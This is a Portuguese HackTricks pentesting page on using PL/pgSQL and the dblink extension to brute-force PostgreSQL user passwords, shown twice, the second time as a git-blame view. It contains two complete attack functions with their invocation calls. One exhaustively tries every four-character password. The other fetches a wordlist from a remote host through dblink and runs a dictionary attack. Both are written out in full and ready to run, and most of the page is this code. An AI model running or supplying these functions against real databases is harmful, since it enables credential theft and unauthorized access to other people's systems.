hacktricks/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md

# Bruteforce de Senha PL/pgSQL

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

O PL/pgSQL, como uma **linguagem de programação completa**, permite um controle mais procedural do que o SQL, incluindo a **capacidade de usar loops e outras estruturas de controle**. Declarações SQL e gatilhos podem chamar funções criadas na linguagem PL/pgSQL.

Você pode abusar dessa linguagem para pedir ao PostgreSQL que faça um brute-force das credenciais dos usuários, mas elas devem existir no banco de dados. Você pode verificar a existência delas usando:
```sql
SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
     lanname | lanacl
    ---------+---------
     plpgsql |
```
Por padrão, **a criação de funções é um privilégio concedido ao PUBLIC**, onde PUBLIC se refere a todos os usuários do sistema de banco de dados. Para evitar isso, o administrador poderia ter revogado o privilégio de USO do domínio PUBLIC:
```sql
REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC;
```
Nesse caso, nossa consulta anterior produziria resultados diferentes:
```sql
SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
     lanname | lanacl
    ---------+-----------------
     plpgsql | {admin=U/admin}
```
Observe que para o seguinte script funcionar **a função `dblink` precisa existir**. Se ela não existir, você pode tentar criá-la com o seguinte comando: &#x20;
```sql
CREATE EXTENSION dblink;
```
## Força Bruta de Senha

Aqui está como você pode realizar uma força bruta de senha de 4 caracteres:
```sql
//Create the brute-force function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
                                username TEXT, dbname TEXT) RETURNS TEXT AS
$$
DECLARE
    word TEXT;
BEGIN
    FOR a IN 65..122 LOOP
        FOR b IN 65..122 LOOP
            FOR c IN 65..122 LOOP
                FOR d IN 65..122 LOOP
                    BEGIN
                        word := chr(a) || chr(b) || chr(c) || chr(d);
                        PERFORM(SELECT * FROM dblink(' host=' || host ||
                                                    ' port=' || port ||
                                                    ' dbname=' || dbname ||
                                                    ' user=' || username ||
                                                    ' password=' || word,
                                                    'SELECT 1') 
                                                    RETURNS (i INT));
                                                    RETURN word;
                        EXCEPTION
                            WHEN sqlclient_unable_to_establish_sqlconnection 
                                THEN
                                    -- do nothing
                    END;
                END LOOP;
            END LOOP;
        END LOOP;
    END LOOP;
    RETURN NULL;
END;
$$ LANGUAGE 'plpgsql';

//Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
```
_Nota que mesmo forçar a entrada de senhas de 4 caracteres pode levar vários minutos._

Você também pode **baixar uma lista de palavras** e tentar apenas essas senhas (ataque de dicionário):
```sql
//Create the function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
                                username TEXT, dbname TEXT) RETURNS TEXT AS
$$
BEGIN
    FOR word IN (SELECT word FROM dblink('host=1.2.3.4
                                            user=name
                                            password=qwerty
                                            dbname=wordlists',
                                            'SELECT word FROM wordlist')
                                        RETURNS (word TEXT)) LOOP
        BEGIN
            PERFORM(SELECT * FROM dblink(' host=' || host ||
                                            ' port=' || port ||
                                            ' dbname=' || dbname ||
                                            ' user=' || username ||
                                            ' password=' || word,
                                            'SELECT 1')
                                        RETURNS (i INT));
            RETURN word;

            EXCEPTION
                WHEN sqlclient_unable_to_establish_sqlconnection THEN
                    -- do nothing
        END;
    END LOOP;
    RETURN NULL;
END;
$$ LANGUAGE 'plpgsql'

//Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
```
**Encontre** [**mais informações sobre esse ataque neste artigo**](http://www.leidecker.info/pgshell/Having\_Fun\_With\_PostgreSQL.txt)**.**

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`# Bruteforce de Senha PL/pgSQL`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`* Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Verifique os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
			`* Descubra [A Família PEASS](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Adquira o [swag oficial do PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Junte-se ao [💬](https://emojipedia.org/speech-balloon/) [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-me no Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e para o [repositório hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`O PL/pgSQL, como uma linguagem de programação completa, permite um controle mais procedural do que o SQL, incluindo a capacidade de usar loops e outras estruturas de controle. Declarações SQL e gatilhos podem chamar funções criadas na linguagem PL/pgSQL.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Você pode abusar dessa linguagem para pedir ao PostgreSQL que faça um brute-force das credenciais dos usuários, mas elas devem existir no banco de dados. Você pode verificar a existência delas usando:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```sql
			`SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';`
			`lanname \| lanacl`
			`---------+---------`
			`plpgsql \|`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Por padrão, a criação de funções é um privilégio concedido ao PUBLIC, onde PUBLIC se refere a todos os usuários do sistema de banco de dados. Para evitar isso, o administrador poderia ter revogado o privilégio de USO do domínio PUBLIC:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```sql
			`REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC;`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Nesse caso, nossa consulta anterior produziria resultados diferentes:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```sql
			`SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';`
			`lanname \| lanacl`
			`---------+-----------------`
			`plpgsql \| {admin=U/admin}`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			Observe que para o seguinte script funcionar a função `dblink` precisa existir. Se ela não existir, você pode tentar criá-la com o seguinte comando:
GitBook: [#3694] No subject 2022-12-21 00:29:12 +00:00			```sql
GitBook: [#3693] No subject 2022-12-20 18:10:20 +00:00			`CREATE EXTENSION dblink;`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`## Força Bruta de Senha`
GitBook: [#3693] No subject 2022-12-20 18:10:20 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Aqui está como você pode realizar uma força bruta de senha de 4 caracteres:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```sql
			`//Create the brute-force function`
			`CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,`
			`username TEXT, dbname TEXT) RETURNS TEXT AS`
			`$$`
			`DECLARE`
			`word TEXT;`
			`BEGIN`
			`FOR a IN 65..122 LOOP`
			`FOR b IN 65..122 LOOP`
			`FOR c IN 65..122 LOOP`
			`FOR d IN 65..122 LOOP`
			`BEGIN`
			`word := chr(a) \|\| chr(b) \|\| chr(c) \|\| chr(d);`
			`PERFORM(SELECT * FROM dblink(' host=' \|\| host \|\|`
			`' port=' \|\| port \|\|`
			`' dbname=' \|\| dbname \|\|`
			`' user=' \|\| username \|\|`
			`' password=' \|\| word,`
			`'SELECT 1')`
			`RETURNS (i INT));`
			`RETURN word;`
			`EXCEPTION`
			`WHEN sqlclient_unable_to_establish_sqlconnection`
			`THEN`
			`-- do nothing`
			`END;`
			`END LOOP;`
			`END LOOP;`
			`END LOOP;`
			`END LOOP;`
			`RETURN NULL;`
			`END;`
			`$$ LANGUAGE 'plpgsql';`

			`//Call the function`
			`select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`_Nota que mesmo forçar a entrada de senhas de 4 caracteres pode levar vários minutos._`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Você também pode baixar uma lista de palavras e tentar apenas essas senhas (ataque de dicionário):`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```sql
			`//Create the function`
			`CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,`
			`username TEXT, dbname TEXT) RETURNS TEXT AS`
			`$$`
			`BEGIN`
			`FOR word IN (SELECT word FROM dblink('host=1.2.3.4`
			`user=name`
			`password=qwerty`
			`dbname=wordlists',`
			`'SELECT word FROM wordlist')`
			`RETURNS (word TEXT)) LOOP`
			`BEGIN`
			`PERFORM(SELECT * FROM dblink(' host=' \|\| host \|\|`
			`' port=' \|\| port \|\|`
			`' dbname=' \|\| dbname \|\|`
			`' user=' \|\| username \|\|`
			`' password=' \|\| word,`
			`'SELECT 1')`
			`RETURNS (i INT));`
			`RETURN word;`

			`EXCEPTION`
			`WHEN sqlclient_unable_to_establish_sqlconnection THEN`
			`-- do nothing`
			`END;`
			`END LOOP;`
			`RETURN NULL;`
			`END;`
			`$$ LANGUAGE 'plpgsql'`

			`//Call the function`
			`select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Encontre [mais informações sobre esse ataque neste artigo](http://www.leidecker.info/pgshell/Having\_Fun\_With\_PostgreSQL.txt).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`* Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
			`* Descubra [A Família PEASS](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Adquira o [swag oficial do PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Junte-se ao [💬](https://emojipedia.org/speech-balloon/) [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-me no Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e para o [repositório hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`